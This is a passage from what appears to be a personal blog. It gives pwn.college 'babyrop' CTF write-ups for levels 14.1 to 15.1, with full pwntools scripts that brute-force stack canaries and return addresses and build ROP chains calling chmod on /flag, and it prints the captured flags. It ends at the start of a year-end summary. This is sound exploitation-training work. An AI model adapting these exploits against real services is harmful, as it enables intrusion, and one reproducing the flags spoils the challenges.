    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    remote,
    sleep,
    time,
)
from pwnlib.gdb import psutil

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level14.1"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
c
"""

CANARY_OFFSET = 0x48
ELF_OFFSET = 0x1726
LIBC_OFFSET = 0x23F90


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    children = psutil.Process(parent_pid).children()

    if len(children) != 1:
        raise ValueError(f"Expected 1 child process, found {len(children)}")

    log.success(f"Parent PID {parent_pid} -> Found child PID {children[0].pid}")

    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                nc_process = process(["nc", HOST, str(PORT)])
                sleep(1)

                gdb.attach(target=get_forked_pid(target.pid), gdbscript=gdbscript)

                return nc_process
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def brute_force(target_type, fixed_byte, canary=b""):
    current = fixed_byte
    length = 0x8 if target_type == "canary" else 0x6
    start_time = time.time()

    while len(current) < length:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                payload = flat(
                    b"".ljust(CANARY_OFFSET, b"A") + current + p8(byte)
                    if target_type == "canary"
                    else b"".ljust(CANARY_OFFSET, b"A")
                    + canary
                    + b"".ljust(0x8, b"A")
                    + current
                    + p8(byte)
                )

                target.send(payload)

                response = target.recvall(timeout=3)

                if (
                    target_type == "canary"
                    and b"*** stack smashing detected ***" not in response
                ) or (target_type == "retaddr" and b"Goodbye!" in response):
                    current += p8(byte)
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"{target_type.capitalize()} brute-forced: {to_hex_bytes(current)} in {elapsed_time:.2f} seconds."
    )

    return current


def construct_payload(stage, canary, retaddr, leaked_libc=None):
    elf.address = int.from_bytes(retaddr, "little") - ELF_OFFSET

    rop = ROP(elf)

    pop_rdi_ret = rop.rdi.address
    pop_rsi_pop_r15_ret = rop.rsi.address

    if stage == 1:
        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            elf.got["__libc_start_main"],
            elf.plt["puts"],
        )
    elif stage == 2:
        if leaked_libc is None:
            log.failure("libc_base is required for stage 2!")
            exit()

        libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
        libc.address = int.from_bytes(leaked_libc, "little") - LIBC_OFFSET

        filename = next(elf.search(b"GNU"))
        mode = 0o4

        return flat(
            b"".ljust(CANARY_OFFSET, b"A"),
            canary,
            b"".ljust(0x8, b"A"),
            pop_rdi_ret,
            filename,
            pop_rsi_pop_r15_ret,
            mode,
            b"".ljust(0x8, b"A"),
            libc.symbols["chmod"],
        )


def attack(stage, canary=None, retaddr=None, leaked_libc=None):
    try:
        if stage == 1:
            with remote(HOST, PORT) as target:
                payload = construct_payload(1, canary, retaddr)
                target.send(payload)

                response = target.recvall(timeout=1)

                return response[-7:].rstrip()
        elif stage == 2:
            os.system("ln -s /flag GNU")

            with remote(HOST, PORT) as target:
                payload = construct_payload(2, canary, retaddr, leaked_libc)

                target.send(payload)
                target.recvall(timeout=1)

            try:
                with open("/flag", "r") as f:
                    log.success(f.read())
                return True
            except FileNotFoundError:
                log.exception("The file '/flag' does not exist.")
            except PermissionError:
                log.failure("Permission denied to read '/flag'.")
        else:
            log.error(b"Invalid stage number!")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        launch(debug=False, attach=False)

        canary = brute_force("canary", b"\x00")
        retaddr = brute_force("retaddr", b"\x26", canary)
        leaked_libc = attack(1, canary, retaddr)

        if attack(2, canary, retaddr, leaked_libc):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{IcjKEpDUZ1r43p0FESk4RB96-1s.0FO2MDL5cTNxgzW}

Level 15.0

Information

Category: Pwn

Description

Perform ROP when the stack frame returns to libc!

Write-up

int __fastcall main(int argc, const char **argv, const char **envp)
{
  __int64 v4; // [rsp+0h] [rbp-C0h] BYREF
  const char **v5; // [rsp+8h] [rbp-B8h]
  const char **v6; // [rsp+10h] [rbp-B0h]
  int v7; // [rsp+1Ch] [rbp-A4h]
  int optval; // [rsp+2Ch] [rbp-94h] BYREF
  int fd; // [rsp+30h] [rbp-90h]
  int v10; // [rsp+34h] [rbp-8Ch]
  int v11; // [rsp+38h] [rbp-88h]
  int v12; // [rsp+3Ch] [rbp-84h]
  const char **v13; // [rsp+40h] [rbp-80h]
  const char **v14; // [rsp+48h] [rbp-78h]
  sockaddr addr; // [rsp+50h] [rbp-70h] BYREF
  _BYTE buf[88]; // [rsp+60h] [rbp-60h] BYREF
  unsigned __int64 v17; // [rsp+B8h] [rbp-8h]
  __int64 savedregs; // [rsp+C0h] [rbp+0h] BYREF
  _UNKNOWN *retaddr; // [rsp+C8h] [rbp+8h] BYREF

  v7 = argc;
  v6 = argv;
  v5 = envp;
  v17 = __readfsqword(0x28u);
  setvbuf(stdin, 0LL, 2, 0LL);
  setvbuf(_bss_start, 0LL, 2, 0LL);
  puts("###");
  printf("### Welcome to %s!\n", *argv);
  puts("###");
  putchar(10);
  puts("This challenge is listening for connections on TCP port 1337.\n");
  puts("The challenge supports unlimited sequential connections.\n");
  fd = socket(2, 1, 0);
  optval = 1;
  setsockopt(fd, 1, 15, &optval, 4u);
  addr.sa_family = 2;
  *(_DWORD *)&addr.sa_data[2] = 0;
  *(_WORD *)addr.sa_data = htons(0x539u);
  bind(fd, &addr, 0x10u);
  listen(fd, 1);
  while ( 1 )
  {
    v10 = accept(fd, 0LL, 0LL);
    if ( !fork() )
      break;
    close(v10);
    wait(0LL);
  }
  dup2(v10, 0);
  dup2(v10, 1);
  dup2(v10, 2);
  close(fd);
  close(v10);
  v11 = v7;
  v13 = v6;
  v14 = v5;
  puts(
    "This challenge reads in some bytes, overflows its stack, and allows you to perform a ROP attack. Through this series of");
  puts("challenges, you will become painfully familiar with the concept of Return Oriented Programming!\n");
  sp_ = (__int64)&v4;
  bp_ = (__int64)&savedregs;
  sz_ = ((unsigned __int64)((char *)&savedregs - (char *)&v4) >> 3) + 2;
  rp_ = (__int64)&retaddr;
  puts(
    "PIE is turned on! This means that you do not know where any of the gadgets in the main binary are. However, you can do a");
  puts(
    "partial overwrite of the saved instruction pointer in order to execute 1 gadget! If that saved instruction pointer goes");
  puts(
    "to libc, you will need to ROP from there. If that saved instruction pointer goes to the main binary, you will need to");
  puts(
    "ROP from there. You may need need to execute your payload several times to account for the randomness introduced. This");
  puts("might take anywhere from 0-12 bits of bruteforce depending on the scenario.\n");
  v12 = read(0, buf, 0x1000uLL);
  printf("Received %d bytes! This is potentially %d gadgets.\n", v12, (unsigned __int64)&buf[v12 - rp_] >> 3);
  puts("Let's take a look at your chain! Note that we have no way to verify that the gadgets are executable");
  puts("from within this challenge. You will have to do that by yourself.");
  print_chain(rp_, (unsigned int)((unsigned __int64)&buf[v12 - rp_] >> 3) + 1);
  puts("Leaving!");
  puts("### Goodbye!");
  return 0;
}

与上一题的区别在于上一题会返回到 binary 的 main 中，而这题直接把所有逻辑都写在 main 里面了，那就会返回到 libc。

因为上题会返回到 main，里面有一些输出信息，所以我们很容易判断返回地址的下一字节是否爆破成功，但这题返回到 libc，默认是要执行 exit() 的，不会产生任何输出信息，直接爆破肯定是得不到完整返回地址的。难点就在这里，怎么确定我的爆破是否成功了，以便继续爆破下一字节？

经实测发现，pwntools 在检测到 fork 出新的子进程后 debug log 会输出这样一段信息：

b'     42242:\t\n'
b'     42242:\ttransferring control: /challenge/babyrop_level15.0\n'
b'     42242:\t\n'

LMAO，看到这段美丽的 debug log 我就知道这题已经到手了！

所以我们只要根据上面这个 transferring control 信息就能判断程序是否成功返回到 fork() 了。然后实际编写 exp 的时候我还发现，在成功返回到 fork() 生成了新的 main 进程后后续的连接都会变得十分缓慢/碰运气，这是因为有两个进程同时监听来自指定端口的连接，产生了条件竞争，我们杀掉一个就好了。幸运的，pwntools 的 debug log 除了提示我们 fork 出了一个新的进程外，还把 fork 出来的子进程的 PID 也告诉我们了，所以我们直接把这个子进程 kill 掉就好了。这无疑为我们编写自动化脚本提供了极大的便利，否则就要手动 kill 了，我看 discord 社区还真有人这么干，显然是没发现 pwntools 的强大……

有关爆破返回地址这里其实还有一个坑，如果你看 got 表：

pwndbg> got -r
State of the GOT of /home/cub3y0nd/Projects/pwn.college/babyrop_level15.0:
GOT protection: Full RELRO | Found 28 GOT entries passing the filter
[0x60fada8bdf20] putchar@GLIBC_2.2.5 -> 0x763654694280 (putchar) ◂— endbr64
[0x60fada8bdf28] __errno_location@GLIBC_2.2.5 -> 0x763654632400 (__errno_location) ◂— endbr64
[0x60fada8bdf30] puts@GLIBC_2.2.5 -> 0x763654692420 (puts) ◂— endbr64
[0x60fada8bdf38] setsockopt@GLIBC_2.2.5 -> 0x76365472e960 (setsockopt) ◂— endbr64
[0x60fada8bdf40] cs_free -> 0x763654a5aba0 (cs_free) ◂— endbr64
[0x60fada8bdf48] __stack_chk_fail@GLIBC_2.4 -> 0x76365473dc90 (__stack_chk_fail) ◂— endbr64
[0x60fada8bdf50] htons@GLIBC_2.2.5 -> 0x76365473dcf0 (ntohs) ◂— endbr64
[0x60fada8bdf58] dup2@GLIBC_2.2.5 -> 0x76365471cae0 (dup2) ◂— endbr64
[0x60fada8bdf60] printf@GLIBC_2.2.5 -> 0x76365466fc90 (printf) ◂— endbr64
[0x60fada8bdf68] close@GLIBC_2.2.5 -> 0x76365471ca20 (close) ◂— endbr64
[0x60fada8bdf70] read@GLIBC_2.2.5 -> 0x76365471c1e0 (read) ◂— endbr64
[0x60fada8bdf78] strcmp@GLIBC_2.2.5 -> 0x763654791df0 ◂— endbr64
[0x60fada8bdf80] cs_disasm -> 0x763654a5b000 (cs_disasm) ◂— endbr64
[0x60fada8bdf88] mincore@GLIBC_2.2.5 -> 0x763654726cc0 (mincore) ◂— endbr64
[0x60fada8bdf90] listen@GLIBC_2.2.5 -> 0x76365472e4e0 (listen) ◂— endbr64
[0x60fada8bdf98] setvbuf@GLIBC_2.2.5 -> 0x763654692ce0 (setvbuf) ◂— endbr64
[0x60fada8bdfa0] bind@GLIBC_2.2.5 -> 0x76365472e380 (bind) ◂— endbr64
[0x60fada8bdfa8] cs_open -> 0x763654a5a6a0 (cs_open) ◂— endbr64
[0x60fada8bdfb0] accept@GLIBC_2.2.5 -> 0x76365472e2e0 (accept) ◂— endbr64
[0x60fada8bdfb8] cs_close -> 0x763654a5a830 (cs_close) ◂— endbr64
[0x60fada8bdfc0] wait@GLIBC_2.2.5 -> 0x7636546f0bd0 (wait) ◂— endbr64
[0x60fada8bdfc8] fork@GLIBC_2.2.5 -> 0x7636546f0ef0 (fork) ◂— endbr64
[0x60fada8bdfd0] socket@GLIBC_2.2.5 -> 0x76365472e9c0 (socket) ◂— endbr64
[0x60fada8bdfd8] _ITM_deregisterTMCloneTable -> 0
[0x60fada8bdfe0] __libc_start_main@GLIBC_2.2.5 -> 0x763654631f90 (__libc_start_main) ◂— endbr64
[0x60fada8bdfe8] __gmon_start__ -> 0
[0x60fada8bdff0] _ITM_registerTMCloneTable -> 0
[0x60fada8bdff8] __cxa_finalize@GLIBC_2.2.5 -> 0x763654654f10 (__cxa_finalize) ◂— endbr64

再看 __libc_start_main 的汇编：

pwndbg> disass __libc_start_main
Dump of assembler code for function __libc_start_main:
   0x0000763654631f90 <+0>: endbr64
   0x0000763654631f94 <+4>: push   r15
   0x0000763654631f96 <+6>: xor    eax,eax
   0x0000763654631f98 <+8>: push   r14
   0x0000763654631f9a <+10>: push   r13
   0x0000763654631f9c <+12>: push   r12
   0x0000763654631f9e <+14>: push   rbp
   0x0000763654631f9f <+15>: push   rbx
   0x0000763654631fa0 <+16>: mov    rbx,rcx
   0x0000763654631fa3 <+19>: sub    rsp,0x98
   0x0000763654631faa <+26>: mov    QWORD PTR [rsp+0x8],rdx
   0x0000763654631faf <+31>: mov    rdx,QWORD PTR [rip+0x1c7f8a]        # 0x7636547f9f40
   0x0000763654631fb6 <+38>: mov    QWORD PTR [rsp+0x18],rdi
   0x0000763654631fbb <+43>: mov    rdi,r9
   0x0000763654631fbe <+46>: mov    DWORD PTR [rsp+0x14],esi
   0x0000763654631fc2 <+50>: test   rdx,rdx
   0x0000763654631fc5 <+53>: je     0x763654631fd0 <__libc_start_main+64>
   0x0000763654631fc7 <+55>: mov    edx,DWORD PTR [rdx]
   0x0000763654631fc9 <+57>: xor    eax,eax
   0x0000763654631fcb <+59>: test   edx,edx
   0x0000763654631fcd <+61>: sete   al
   0x0000763654631fd0 <+64>: mov    DWORD PTR [rip+0x1c81ca],eax        # 0x7636547fa1a0
   0x0000763654631fd6 <+70>: test   rdi,rdi
   0x0000763654631fd9 <+73>: je     0x763654631fe4 <__libc_start_main+84>
   0x0000763654631fdb <+75>: xor    edx,edx
   0x0000763654631fdd <+77>: xor    esi,esi
   0x0000763654631fdf <+79>: call   0x763654654de0 <__cxa_atexit>
   0x0000763654631fe4 <+84>: mov    rdx,QWORD PTR [rip+0x1c7e75]        # 0x7636547f9e60
   0x0000763654631feb <+91>: mov    ebp,DWORD PTR [rdx]
   0x0000763654631fed <+93>: and    ebp,0x2
   0x0000763654631ff0 <+96>: jne    0x76365463208a <__libc_start_main+250>
   0x0000763654631ff6 <+102>: test   rbx,rbx
   0x0000763654631ff9 <+105>: je     0x763654632010 <__libc_start_main+128>
   0x0000763654631ffb <+107>: mov    rax,QWORD PTR [rip+0x1c7eae]        # 0x7636547f9eb0
   0x0000763654632002 <+114>: mov    rsi,QWORD PTR [rsp+0x8]
   0x0000763654632007 <+119>: mov    edi,DWORD PTR [rsp+0x14]
   0x000076365463200b <+123>: mov    rdx,QWORD PTR [rax]
   0x000076365463200e <+126>: call   rbx
   0x0000763654632010 <+128>: mov    rdx,QWORD PTR [rip+0x1c7e49]        # 0x7636547f9e60
   0x0000763654632017 <+135>: mov    eax,DWORD PTR [rdx+0x210]
   0x000076365463201d <+141>: test   eax,eax
   0x000076365463201f <+143>: jne    0x7636546320ec <__libc_start_main+348>
   0x0000763654632025 <+149>: test   ebp,ebp
   0x0000763654632027 <+151>: jne    0x763654632150 <__libc_start_main+448>
   0x000076365463202d <+157>: lea    rdi,[rsp+0x20]
   0x0000763654632032 <+162>: call   0x763654650c80 <_setjmp>
   0x0000763654632037 <+167>: endbr64
   0x000076365463203b <+171>: test   eax,eax
   0x000076365463203d <+173>: jne    0x7636546320a6 <__libc_start_main+278>
   0x000076365463203f <+175>: mov    rax,QWORD PTR fs:0x300
   0x0000763654632048 <+184>: mov    QWORD PTR [rsp+0x68],rax
   0x000076365463204d <+189>: mov    rax,QWORD PTR fs:0x2f8
   0x0000763654632056 <+198>: mov    QWORD PTR [rsp+0x70],rax
   0x000076365463205b <+203>: lea    rax,[rsp+0x20]
   0x0000763654632060 <+208>: mov    QWORD PTR fs:0x300,rax
   0x0000763654632069 <+217>: mov    rax,QWORD PTR [rip+0x1c7e40]        # 0x7636547f9eb0
   0x0000763654632070 <+224>: mov    rsi,QWORD PTR [rsp+0x8]
   0x0000763654632075 <+229>: mov    edi,DWORD PTR [rsp+0x14]
   0x0000763654632079 <+233>: mov    rdx,QWORD PTR [rax]
   0x000076365463207c <+236>: mov    rax,QWORD PTR [rsp+0x18]
   0x0000763654632081 <+241>: call   rax
   0x0000763654632083 <+243>: mov    edi,eax
   0x0000763654632085 <+245>: call   0x763654654a40 <exit>
   0x000076365463208a <+250>: mov    rax,QWORD PTR [rsp+0x8]
   0x000076365463208f <+255>: lea    rdi,[rip+0x18fdd2]        # 0x7636547c1e68
   0x0000763654632096 <+262>: mov    rsi,QWORD PTR [rax]
   0x0000763654632099 <+265>: xor    eax,eax
   0x000076365463209b <+267>: call   QWORD PTR [rdx+0x1d0]
   0x00007636546320a1 <+273>: jmp    0x763654631ff6 <__libc_start_main+102>
   0x00007636546320a6 <+278>: mov    rax,QWORD PTR [rip+0x1cd3cb]        # 0x7636547ff478
   0x00007636546320ad <+285>: ror    rax,0x11
   0x00007636546320b1 <+289>: xor    rax,QWORD PTR fs:0x30
   0x00007636546320ba <+298>: call   rax
   0x00007636546320bc <+300>: mov    rax,QWORD PTR [rip+0x1cd3a5]        # 0x7636547ff468
   0x00007636546320c3 <+307>: ror    rax,0x11
   0x00007636546320c7 <+311>: xor    rax,QWORD PTR fs:0x30
   0x00007636546320d0 <+320>: lock dec DWORD PTR [rax]
   0x00007636546320d3 <+323>: sete   dl
   0x00007636546320d6 <+326>: test   dl,dl
   0x00007636546320d8 <+328>: jne    0x7636546320e8 <__libc_start_main+344>
   0x00007636546320da <+330>: mov    edx,0x3c
   0x00007636546320df <+335>: nop
   0x00007636546320e0 <+336>: xor    edi,edi
   0x00007636546320e2 <+338>: mov    eax,edx
   0x00007636546320e4 <+340>: syscall
   0x00007636546320e6 <+342>: jmp    0x7636546320e0 <__libc_start_main+336>
   0x00007636546320e8 <+344>: xor    eax,eax
   0x00007636546320ea <+346>: jmp    0x763654632083 <__libc_start_main+243>
   0x00007636546320ec <+348>: mov    r13,QWORD PTR [rip+0x1c7cfd]        # 0x7636547f9df0
   0x00007636546320f3 <+355>: mov    r12d,eax
   0x00007636546320f6 <+358>: mov    r14,QWORD PTR [rdx+0x208]
   0x00007636546320fd <+365>: shl    r12,0x4
   0x0000763654632101 <+369>: mov    r15,QWORD PTR [r13+0x0]
   0x0000763654632105 <+373>: mov    rbx,r15
   0x0000763654632108 <+376>: add    r12,r15
   0x000076365463210b <+379>: cmp    rbx,r12
   0x000076365463210e <+382>: je     0x763654632025 <__libc_start_main+149>
   0x0000763654632114 <+388>: mov    rax,QWORD PTR [r14+0x18]
   0x0000763654632118 <+392>: test   rax,rax
   0x000076365463211b <+395>: je     0x763654632139 <__libc_start_main+425>
   0x000076365463211d <+397>: mov    rdx,QWORD PTR [rip+0x1c7ccc]        # 0x7636547f9df0
   0x0000763654632124 <+404>: lea    rdi,[rbx+0x480]
   0x000076365463212b <+411>: add    rdx,0x988
   0x0000763654632132 <+418>: cmp    r15,rdx
   0x0000763654632135 <+421>: je     0x763654632147 <__libc_start_main+439>
   0x0000763654632137 <+423>: call   rax
   0x0000763654632139 <+425>: mov    r14,QWORD PTR [r14+0x40]
   0x000076365463213d <+429>: add    r13,0x10
   0x0000763654632141 <+433>: add    rbx,0x10
   0x0000763654632145 <+437>: jmp    0x76365463210b <__libc_start_main+379>
   0x0000763654632147 <+439>: lea    rdi,[r13+0xe08]
   0x000076365463214e <+446>: jmp    0x763654632137 <__libc_start_main+423>
   0x0000763654632150 <+448>: mov    rax,QWORD PTR [rsp+0x8]
   0x0000763654632155 <+453>: mov    rdx,QWORD PTR [rip+0x1c7d04]        # 0x7636547f9e60
   0x000076365463215c <+460>: lea    rdi,[rip+0x18fd1f]        # 0x7636547c1e82
   0x0000763654632163 <+467>: mov    rsi,QWORD PTR [rax]
   0x0000763654632166 <+470>: xor    eax,eax
   0x0000763654632168 <+472>: call   QWORD PTR [rdx+0x1d0]
   0x000076365463216e <+478>: jmp    0x76365463202d <__libc_start_main+157>
End of assembler dump.

真 TM 巧啊…… fork() 在 libc 中的固定字节正巧是 \xf0（爆破返回地址这种事情我不习惯固定倒数第三个 nibble，不然我早就可以意识到后续的问题了）、__libc_start_main 中 \xf0 处的指令 jne 正巧不会跳转、下面继续执行的正巧是 fork()。这一连串的巧合让我在分析的时候百思不得其解啊，为毛计算了 fork() 到 libc 之间的偏移就是 TMD 执行不了我的 ROP Chain……因为我在打 Level 14 的时候也碰到过 exp 没问题但就是打不通的问题，多打几次就好了……我！草！又 TM 是一个巧合……最后导致我在这上面耗了大概……好几个小时？一下午？无所谓了……

这说明了我对程序的细粒度还不够敏感，不过有了这次经验后以后就长记性了……毕竟我们的默认返回地址是返回到 __libc_start_main 中的，而我们又是从低位开始爆破，怎么着也不可能走到 libc 中的 fork() 吧……大概率会掉到 __libc_start_main 中的一个 call 里才是。确实，说不可能有点太绝对了，不够严谨。其实在满足了『天时、地利、人和』的情况下还是很有可能的，只是可能性有点小。

~最后，我觉得一切的罪魁祸首是我 ret2fork 的灵感来源于 got 表，真不知道该谢谢你还是……如果说有人想浪费我的时间很困难……6，被你做到了，而且非常完美……~

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    re,
    remote,
    signal,
    sleep,
    time,
)
from pwnlib.gdb import psutil

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level15.0"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
c
"""

CANARY_OFFSET = 0x58
LIBC_OFFSET = 0x23FF0


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    children = psutil.Process(parent_pid).children()

    if len(children) != 1:
        raise ValueError(f"Expected 1 child process, found {len(children)}")

    log.success(f"Parent PID {parent_pid} -> Found child PID {children[0].pid}")

    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                nc_process = process(["nc", HOST, str(PORT)])
                sleep(1)

                gdb.attach(target=get_forked_pid(target.pid), gdbscript=gdbscript)

                return nc_process
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def brute_force(target_type, fixed_byte, canary=b""):
    current = fixed_byte
    length = 0x8 if target_type == "canary" else 0x6
    start_time = time.time()

    while len(current) < length:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                payload = flat(
                    b"".ljust(CANARY_OFFSET, b"A") + current + p8(byte)
                    if target_type == "canary"
                    else b"".ljust(CANARY_OFFSET, b"A")
                    + canary
                    + b"".ljust(0x8, b"A")
                    + current
                    + p8(byte)
                )

                target.send(payload)

                response = target.recvall(timeout=5)

                if (
                    target_type == "canary"
                    and b"*** stack smashing detected ***" not in response
                ) or (target_type == "retaddr" and b"transferring control" in response):
                    current += p8(byte)

                    pattern = r"(\d+):\ttransferring control"
                    matches = re.findall(
                        pattern, response.decode("utf-8", errors="ignore")
                    )

                    if matches:
                        pid = int(matches[0])
                        os.kill(pid, signal.SIGTERM)
                    else:
                        log.failure(b"No matching PID found!")
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"{target_type.capitalize()} brute-forced: {to_hex_bytes(current)} in {elapsed_time:.2f} seconds."
    )

    return current


def construct_payload(canary, leaked_libc):
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    libc.address = int.from_bytes(leaked_libc, "little") - LIBC_OFFSET

    rop = ROP(libc)

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address

    filename = next(libc.search(b"GNU"))
    mode = 0o4

    return flat(
        b"".ljust(CANARY_OFFSET, b"A"),
        canary,
        b"".ljust(0x8, b"A"),
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        libc.symbols["chmod"],
    )


def attack(canary, leaked_libc):
    try:
        os.system("ln -s /flag GNU")

        with remote(HOST, PORT) as target:
            payload = construct_payload(canary, leaked_libc)

            target.send(payload)
            target.recvall(timeout=1)

        try:
            with open("/flag", "r") as f:
                log.success(f.read())
            return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        launch(debug=False, attach=False)

        canary = brute_force("canary", b"\x00")
        leaked_libc = brute_force("retaddr", b"\xf0", canary)

        if attack(canary, leaked_libc):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{wOJjH27pmDvy68va0GzxQ3gHz6_.0VO2MDL5cTNxgzW}

Level 15.1

Information

Category: Pwn

Description

Perform ROP when the stack frame returns to libc!

Write-up

参见 Level 15.0。

Exploit

#!/usr/bin/python3

from pwn import (
    ELF,
    ROP,
    context,
    flat,
    gdb,
    log,
    os,
    p8,
    process,
    re,
    remote,
    signal,
    sleep,
    time,
)
from pwnlib.gdb import psutil

context(log_level="debug", terminal="kitty")

FILE = "./babyrop_level15.1"
HOST, PORT = "localhost", 1337

gdbscript = """
set follow-fork-mode child
c
"""

CANARY_OFFSET = 0x48
LIBC_OFFSET = 0x23FF0


def to_hex_bytes(data):
    return "".join(f"\\x{byte:02x}" for byte in data)


def get_forked_pid(parent_pid):
    children = psutil.Process(parent_pid).children()

    if len(children) != 1:
        raise ValueError(f"Expected 1 child process, found {len(children)}")

    log.success(f"Parent PID {parent_pid} -> Found child PID {children[0].pid}")

    return children[0].pid


def launch(local=True, debug=False, aslr=False, argv=None, envp=None, attach=False):
    if local:
        global elf

        elf = ELF(FILE)
        context.binary = elf

        target = process([elf.path] + (argv or []), env=envp, aslr=aslr)

        if debug:
            if attach:
                nc_process = process(["nc", HOST, str(PORT)])
                sleep(1)

                gdb.attach(target=get_forked_pid(target.pid), gdbscript=gdbscript)

                return nc_process
            else:
                target.close()

                return gdb.debug(
                    [elf.path] + (argv or []), gdbscript=gdbscript, aslr=aslr, env=envp
                )
        else:
            return process([elf.path] + (argv or []), env=envp)
    else:
        return remote(HOST, PORT)


def brute_force(target_type, fixed_byte, canary=b""):
    current = fixed_byte
    length = 0x8 if target_type == "canary" else 0x6
    start_time = time.time()

    while len(current) < length:
        for byte in range(0x0, 0xFF):
            with remote(HOST, PORT) as target:
                payload = flat(
                    b"".ljust(CANARY_OFFSET, b"A") + current + p8(byte)
                    if target_type == "canary"
                    else b"".ljust(CANARY_OFFSET, b"A")
                    + canary
                    + b"".ljust(0x8, b"A")
                    + current
                    + p8(byte)
                )

                target.send(payload)

                response = target.recvall(timeout=5)

                if (
                    target_type == "canary"
                    and b"*** stack smashing detected ***" not in response
                ) or (target_type == "retaddr" and b"transferring control" in response):
                    current += p8(byte)

                    pattern = r"(\d+):\ttransferring control"
                    matches = re.findall(
                        pattern, response.decode("utf-8", errors="ignore")
                    )

                    if matches:
                        pid = int(matches[0])
                        os.kill(pid, signal.SIGTERM)
                    else:
                        log.failure(b"No matching PID found!")
                    break

    end_time = time.time()
    elapsed_time = end_time - start_time

    log.success(
        f"{target_type.capitalize()} brute-forced: {to_hex_bytes(current)} in {elapsed_time:.2f} seconds."
    )

    return current


def construct_payload(canary, leaked_libc):
    libc = ELF("/lib/x86_64-linux-gnu/libc.so.6")
    libc.address = int.from_bytes(leaked_libc, "little") - LIBC_OFFSET

    rop = ROP(libc)

    pop_rdi_ret = rop.rdi.address
    pop_rsi_ret = rop.rsi.address

    filename = next(libc.search(b"GNU"))
    mode = 0o4

    return flat(
        b"".ljust(CANARY_OFFSET, b"A"),
        canary,
        b"".ljust(0x8, b"A"),
        pop_rdi_ret,
        filename,
        pop_rsi_ret,
        mode,
        libc.symbols["chmod"],
    )


def attack(canary, leaked_libc):
    try:
        os.system("ln -s /flag GNU")

        with remote(HOST, PORT) as target:
            payload = construct_payload(canary, leaked_libc)

            target.send(payload)
            target.recvall(timeout=1)

        try:
            with open("/flag", "r") as f:
                log.success(f.read())
            return True
        except FileNotFoundError:
            log.exception("The file '/flag' does not exist.")
        except PermissionError:
            log.failure("Permission denied to read '/flag'.")
    except Exception as e:
        log.exception(f"An error occurred while performing attack: {e}")


def main():
    try:
        launch(debug=False, attach=False)

        canary = brute_force("canary", b"\x00")
        leaked_libc = brute_force("retaddr", b"\xf0", canary)

        if attack(canary, leaked_libc):
            exit()
    except Exception as e:
        log.exception(f"An error occurred in main: {e}")


if __name__ == "__main__":
    main()

Flag

Flag: pwn.college{Y_8emGu4QF43dsSwmrNIX6MC17Q.0FM3MDL5cTNxgzW}

后记

让我算算这章又打了多久……唔，七天（减去了我中途学堆的三天）！这是不是我打的最快的一章？没印象，好像 shellcode 更快，只打了三天吧？懒得查记录了……

2024 年终总结

Wed, 01 Jan 2025 00:00:00 GMT

启辞

去年看见 N1nEmAn 师傅写的年终总结，就觉得很棒很帅啊，一年能有那么大的成长，别提多激励我了。

今年，也算是发生了点事吧，虽然不知道能写出来点啥，但是想到就干，哪怕最后只是列年线哈哈哈。

24 年如白驹过隙，转瞬已是年末。回首这一年，仿佛经历了许多，却又似乎什么也没留下。时光总悄然流逝，来不及细细体味。这一年，忙碌依旧是生活的主旋律，平凡依旧是日子的底色，但每一步都镌刻下独一无二的印记，每一个瞬间都蕴藏着成长的契机。

失去也罢，获得也好，释怀与成长，欢喜与遗憾，皆已化作岁月的一部分，融入时间的长河，成为记忆的风景。每一次波澜壮阔，每一份静谧安然，都是生命不可或缺的篇章，也是来年继续前行的基石。

哦对了，25 年是 Python 年，祝大家 Python 年快乐！懂的都懂哈哈哈哈哈哈哈。

成就 | 光辉荣耀既往事，策马扬鞭奔前程

总体来看今年成就还真不少，反正相比往年肯定是吊打的哈哈哈，但是我就挑一部分写了。

漏洞挖掘

